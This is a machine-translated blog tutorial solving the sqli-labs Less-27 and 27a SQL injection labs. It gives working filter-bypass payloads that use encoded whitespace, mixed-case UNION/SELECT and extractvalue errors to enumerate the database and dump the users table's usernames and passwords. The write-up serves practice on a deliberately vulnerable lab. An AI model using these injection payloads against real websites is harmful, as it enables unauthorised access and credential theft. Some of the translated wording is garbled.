当前位置:网站首页>(manual) [sqli labs27, 27a] error echo, Boolean blind injection, filtered injection
(manual) [sqli labs27, 27a] error echo, Boolean blind injection, filtered injection
2022-07-28 04:44:00 【Black zone (rise)】
Catalog
One 、( manual )SQL Basic steps of injection :
Two 、Less27(GET-Error based - All your UNION & SELECT belong to us-string single quote)
2.1、 brief introduction :( Filter - Error echo - Single quotation marks )
2.2、 First step : Injection point test
2.3、 The second step : Analysis and filtering
2.4、 The third step : Determine the number of fields
2.6、 Step five : Name of Pop Watch
3、 ... and 、Less27a(GET-Blind based - All your UNION & SELECT belong to us Double quote )
3.1、 brief introduction :( Filter - Bull's blind note - Double quotes )
recommend :
One 、( manual )SQL Basic steps of injection :
First step : Injection point test
The second step : Analyze permissions
The third step : Determine the number of fields
Step four : Burst database name
Step five : Name of Pop Watch
Step six : Pop field name
Step seven : Burst data
Two 、Less27(GET-Error based - All your UNION & SELECT belong to us-string single quote)
2.1、 brief introduction :( Filter - Error echo - Single quotation marks )
Request method :GET
Method : Filter and replace : /* , – , # , Space , /、union、select、UNION、SELECT、Union、Select+ Error echo
2.2、 First step : Injection point test
Input ?id=1
A single quotation mark is added after it, and an error is found
The description is closed in single quotation marks , That is, character injection
And the error can be used to echo
2.3、 The second step : Analysis and filtering
Method 1 :
Consider replacing the injected statement characters one by one step , Until there is no error ( A waste of time )
Or replace them all ( If you make a mistake , I don't know where it is filtered )
Method 2 :
Get the source code for white box audit ( The optimal )
Method 3 :eg: Input id=union
Look at the input echo filter statement
Finally, you can know that the filtered characters are
/* , – , # , Space , /,/s
union、select、UNION、SELECT、Union、Select
Replace spaces :
%09 TAB key ( level )
%0a Create a new line
%0c A new page
%0d return function
%0b TAB key ( vertical )
%a0 Space
Change the space to ||
Comments are filtered out , You can use splicing statements , take 2 The side is closed
union and select You can use case obfuscation to bypass , Or double write
2.4、 The third step : Determine the number of fields
2.5、 Step four : Warehouse
?id=1'%26%26extractvalue(1, concat(0x7e, database()))%26%26'1
perhaps
?id=0'unIon%0BSelEcT%0B1,database(),3||'1
2.6、 Step five : Name of Pop Watch
?id=0'%0AunIon%0ASeLeCt%0A1,(SeLeCt%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'),3||'1
perhaps
?id=0'||extractvalue(1,concat(0x7e,(sEleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)=database())))||'
2.7、 Step six : Pop field
?id=0'%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b'1'='1
perhaps
?id=1'||extractvalue(1,concat(0x7e,(sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema)=(database())and(table_name)='users')))||'
2.8、 Step seven : Burst data
?id=1'||extractvalue(1,concat(0x7e,(sEleCt(substr((group_concat(username,password)),1,32))from(users))))||'
perhaps
?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/1,(SeLeCt/*%0a*/group_concat(concat_ws('$',id,username,password))/*%0a*/from/*%0a*/users),3/*%0a*/||/*%0a*/'1'='1
3、 ... and 、Less27a(GET-Blind based - All your UNION & SELECT belong to us Double quote )
3.1、 brief introduction :( Filter - Bull's blind note - Double quotes )
Request method :GET
Method : Filter and replace : /* , – , # , Space , /、union、select、UNION、SELECT、Union、Select+ Bull's blind note
3.2、 characteristic :
Double quote character Injection , have access to union Joint injection
No error echo ( That is, no error injection updatexml Functions, etc )
The correct and error pages are different , Boolean blind injection can be carried out , Because he has no error echo
You can also delay blind injection
3.3、 Use process :
Basically and Less26 Using federated queries
Perform Boolean blind Injection ( Judge )
?id=0"unIon%0BSelEcT%0B1,database(),"3
……
边栏推荐
- 重要的 SQL Server 函数 - 字符串实用程序
- [Sylar] framework chapter -chapter10-address module
- [II. Mobile web page development] 2D & 3D conversion and animation, mobile terminal layout, responsive layout
- [Oracle] 083 wrong question set
- 【sylar】实战篇-基于 redis 的参数查询服务
- 【sylar】框架篇-Chapter6-协程调度模块
- Render the data obtained from the database to the table in elementui
- What to do when encountering slow SQL? (next)
- CMake使用基础汇总
- Pyqt based grouping tool
猜你喜欢

Practice and thinking of AI standardization engine in pink client

Use Baidu developer tool 4.0 to build a dedicated applet IDE

启发国内学子学习少儿机器人编程教育

重要的 SQL Server 函数 - 其他函数

空间复杂度计算超全整理!!(一起手撕复杂度计算

MySQL数据库————初识数据库

重要的 SQL Server 函数 - 数字函数

Reading the paper "learning span level interactions for aspect sentimental triple extraction"

Destructor of member function

【Oracle】083错题集
随机推荐
[每日一氵]上古年代的 Visual Studio2015 安装
21 openwrt kernel module changed to.Ko automatic loading
Destructor of member function
[function document] torch Histc and paddle Histogram and numpy.histogram
启发国内学子学习少儿机器人编程教育
【sylar】框架篇-Chapter8-定时器模块
Transformer landing | next vit realizes the real-time landing of industrial tensorrt, surpassing RESNET and cswin
01-Node-Express系统框架搭建(express-generator)
transform: failed to synchronize: cudaErrorAssert: device-side assert triggered
[Sylar] practical part - redis based parameter query service
10 more advanced open source command line tools
Advanced architects, 16 common principles of microservice design and Governance
Select sorting method
重要的 SQL Server 函数 - 数字函数
High number_ Chapter 4__ Curvilinear integral_ Exercise solution
【sylar】框架篇-Chapter14-TcpServer 模块
[Sylar] framework -chapter11 socket module
Cloud native Devops status survey questionnaire solicitation: kodelurover launched jointly with oschina
Artificial intelligence and RPA technology application (I) -rpa Hongji product introduction, designer interface function explanation
Machine learning and deep learning -- normalization processing
https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165770191616781818723356%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165770191616781818723356&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125275974-null-null.185^v2^control&utm_term=%E5%B8%83%E5%B0%94&spm=1018.2226.3001.4450









